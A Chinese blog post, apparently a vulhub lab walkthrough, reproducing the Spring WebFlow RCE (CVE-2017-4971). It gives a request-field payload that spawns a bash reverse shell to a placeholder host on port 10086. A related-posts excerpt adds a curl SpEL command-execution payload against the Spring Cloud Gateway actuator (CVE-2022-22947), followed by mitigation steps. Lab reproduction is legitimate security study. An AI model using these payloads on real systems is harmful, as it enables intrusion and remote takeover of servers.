Spring远程代码执行漏洞

最新推荐文章于 2025-04-01 15:25:21 发布
最新推荐文章于 2025-04-01 15:25:21 发布
阅读量6.2k 收藏 3
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Snowflake1997/article/details/123568949
版权
本文详细介绍了如何通过WebFlow环境构造漏洞,执行反弹Shell的操作。首先使用docker-compose启动服务,然后通过预设的账号登录系统,访问特定酒店ID并进行预订操作。在预订过程中,抓包并修改POST数据包,插入反弹Shell的POC,最终成功获取远程shell。此过程揭示了Web应用安全中的重要一环——权限滥用与命令注入。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先进入漏洞环境

构造所需漏洞

docker-compose up -d

在浏览器中访问

首先访问http://your-ip:8080/login,用页面左边给出的任意一个账号/密码登录系统

然后访问id为1的酒店http://your-ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Process”(从这一步,其实WebFlow就正式开始了):

再点击确认“Confirm”

此时抓包,抓到一个POST数据包,我们向其中添加一个字段(也就是反弹shellPOC):

&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/x.x.x.x/10086+0>%261")).start()=vulhub  

成功执行,获得shell

冰 雪
关注
Vackbot已覆盖 |【漏洞通告】Spring框架远程代码执行漏洞
Moyun_vackbot的博客
04-02 4098
近日,墨云科技监测到Spring框架中存在远程代码执行漏洞,在JDK 9及以上版本环境下,攻击者通过构造恶意的请求修改中间件的日志文件,从而实现远程代码执行
Spring框架远程命令执行漏洞复现
xiaoMiao的博客
04-11 7254
Spring框架远程命令执行漏洞docker环境复现 记录篇~
spring框架远程代码执行漏洞(CVE-2017-4971)
Z_l123的博客
03-17 5613
漏洞影响 影响版本:Spring WebFlow 2.4.0 - 2.4.4 漏洞复现 搭建漏洞环境并访问 点击左上角登录,使用左边给的用户名密码登录 登录后 访问 id=1的酒店http://your-ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Proceed” 点击confirm时,进行抓包 使用如下反弹shell的Payload &_(new+java.lang.ProcessBuilder("b.
Java之SpringBoot漏洞利用姿势合集总结详细版,从零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
04-01 1414
Spring 框架,江湖人称 Java 界的瑞士军刀,功能那是相当强大,目标是提供一个高效且可扩展的开发环境。。,提供了依赖注入(IoC)、面向切面编程(AOP)、数据访问和事务管理等神兵利器。Spring MVC。DispatcherServlet、注解驱动、视图解析,三大特性让你轻松驾驭 Web 开发。,基于 Spring Framework,自动配置、内嵌服务器、快速启动,让你告别繁琐配置。自动配置、内嵌 Tomcat、独立运行、Starter 依赖,四大金刚护体。
Spring Messaging 远程命令执行漏洞(CVE-2018-1270)
黑白的博客
12-20 1315
声明 好好学习,天天向上 漏洞描述 spring messaging为spring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS, 在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用StandardEvaluationContext解析,造成命令执行漏洞。 影响范围 Spring Framework 5.0 to 5.0.4. Spring Framework 4.3 to 4.3.14 已不支持的旧版
Spring 框架远程代码执行漏洞(CVE-2022-22965
panda的博客
04-08 4944
Spring 框架远程代码执行漏洞(CVE-2022-22965)
CVE-2022-22965Spring远程代码执行漏洞
Ajekseg的博客
09-09 3201
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
weixin_45715461的博客
08-10 1658
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
【干货】Spring远程命令执行漏洞(CVE-2022-22965)原理分析和思考
2201_75735270的博客
07-25 928
上周网上爆出Spring框架存在RCE漏洞,野外流传了一小段时间后,Spring官方在3月31日正式发布了漏洞信息,漏洞编号为CVE-2022-22965。本文章对该漏洞进行了复现和分析,希望能够帮助到有相关有需要的人员进一步研究。
Spring远程命令执行漏洞的简单概要
m0_50579386的博客
04-10 389
2022 年 3 月 31日,国家信息安全漏洞共享平台(CNVD)收录了 Spring 框架远程命令执行漏洞,并发布了关于 Spring 框架存在远程命令执行漏洞安全公告,安全公告编号:CNTA-2022-0009,POC、EXP等漏洞利用细节已经公开,建议受影响的用户自查安全工作。
structs2最新远程执行漏洞S2-057、反序列化漏洞等修复方案
08-30
Apache Struts2 官方发布了最新的安全公告,披露了一个远程命令执行漏洞漏洞编号:CVE-2018-11776,官方编号:S2-057),攻击者可利用漏洞实施远程命令执行攻击。特给出struct2.0-2.3.35的修复方案
spring core远程代码执行漏洞复现
DTSknanLP的博客
04-02 2789
Spring Core漏洞复现笔记
spring漏洞合集 下
寒星的博客
05-07 5628
前言 现在的 java 开放的网站十个里面有九个是 spring 写的。网上对 spring 相关漏洞的资料很多,但是总结的文章却很少,再加上 spring 庞大的生态,每当看到 spring 相关网站的时候,脑子里虽然零零散散冒出来一堆漏洞,但是却不知道哪些符合当前环境。 因此搜集了所有 spring 相关漏洞,对它们的利用条件和检测方式进行梳理和总结,希望在面对 spring 的时候,能够有一个更完整的思路去发现漏洞。 这里更多是的是的利用条件和检测方式的总结,主要以发现漏洞为目的,至于如何将漏洞效果最
Spring框架(Framework)存在远程命令执行漏洞
qq_20025777的博客
08-31 698
Spring框架存在远程命令执行漏洞
Spring Framework远程代码执行漏洞_CVE-2022-22965复现
beichenyyds的博客
04-07 4090
1. 漏洞介绍 Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE 应用程序开发提供了一个好用的框架。当Spring部署在JDK9及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行2、受影响版本 Spring Core <= 5.2.19, <= 5.3.17 Spring Boot <= 2.6.5 3、利用前提 JDK 9 及以上版本 Spring框架的5.3.0
Spring框架常见漏洞
本散修的一些学习心得与笔记,道友请自便。
09-17 1364
本篇文章主要是内容常见Spring漏洞的解析以及理解。
Spring Framework远程代码执行漏洞
m0_71745903的博客
01-11 818
2022年3月30日,国家信息安全漏洞共享平台(CNVD)发布了Spring框架远程命令执行漏洞(攻击者利用该漏洞,可在未授权的情况下远程执行命令。目前,此漏洞POC、技术细节及EXP已大范围公开,此漏洞影响范围极大。目前Spring官方已发布补丁修复该漏洞,强烈建议Spring框架用户立即更新至最新版本。
记录一次vulhub:Spring Framework远程代码执行漏洞复现(CVE-2022-22965
sszsNo1的博客
06-29 305
vulhub:Spring Framework远程代码执行漏洞复现(CVE-2022-22965
Spring Cloud Gateway 远程代码执行漏洞
01-16
### CVE-2022-22947:Spring Cloud Gateway 远程代码执行漏洞详情 #### 漏洞概述 CVE-2022-22947 是一个存在于 Spring Cloud Gateway 中的严重安全漏洞,允许未经身份验证的攻击者通过精心构造的 HTTP 请求实现远程代码执行 (RCE)[^1]。 #### 影响版本 此漏洞影响了多个版本的 Spring Cloud Gateway 应用程序,在启用了 Actuator 并暴露 `/actuator/gateway` 端点的情况下尤为危险。受影响的具体版本包括但不限于: - Spring Cloud 2021.0.x 版本之前的所有版本 - Hoxton.SR8 及更早版本 - 2020.0.3 及更早版本[^2] #### 漏洞成因 当应用程序配置不当并公开敏感管理接口时,攻击者能够利用这些开放接口提交恶意负载来操纵内部逻辑处理流程,最终达到控制服务器的目的。特别是当 `spring.cloud.gateway.actuator.enabled=true` 和 `management.endpoints.web.exposure.include=gateway` 被设置为 true 或未被适当保护时风险更高[^3]。 #### 复现过程简述 要重现该漏洞,通常需要满足以下几个条件: 1. 使用易受攻击版本构建的服务实例; 2. 配置文件中开启了 actuator 功能模块; 3. 对外网路可达性良好且无额外防护措施(如防火墙规则限制)。 在此基础上,攻击者可通过向目标主机发送特制HTTP POST请求至 `/actuator/gateway/filters/reload` 来触发漏洞,并可能进一步获取系统权限或执行任意命令[^4]。 ```bash curl -X POST http://target:port/actuator/gateway/filters/reload \ -H "Content-Type: application/json" \ -d '{"predicates":[],"filters":[{"name":"AddResponseHeader","args":{"name":"foo","value":"${T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')}"}]}' ``` 上述 curl 命令展示了如何构造一个简单的 payload 来测试是否存在 RCE 漏洞;实际环境中应谨慎操作以免造成不必要的损害。 --- ### 解决方案与预防措施 针对这一严重的安全隐患,官方已经发布了补丁更新以解决这个问题。对于正在运行中的项目而言,则建议采取如下行动项尽快完成修复工作: - **立即升级到最新稳定版**:确保所使用的 spring-cloud-dependencies 至少为 2021.0.0 或以上版本。 - **禁用不必要端点**:除非确实有业务需求,否则应当关闭所有非必需的 actuator endpoint 访问路径,尤其是那些涉及动态修改应用行为的功能选项。 - **加强访问控制策略**:即使某些功能必须保持开启状态,也务必配合严格的认证机制以及细粒度的角色授权体系加以管控,防止未经授权的操作发生。 - **定期审查依赖库的安全公告**:时刻关注来自供应商或其他可信渠道发布的各类预警信息,及时响应潜在威胁并作出相应调整。 ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值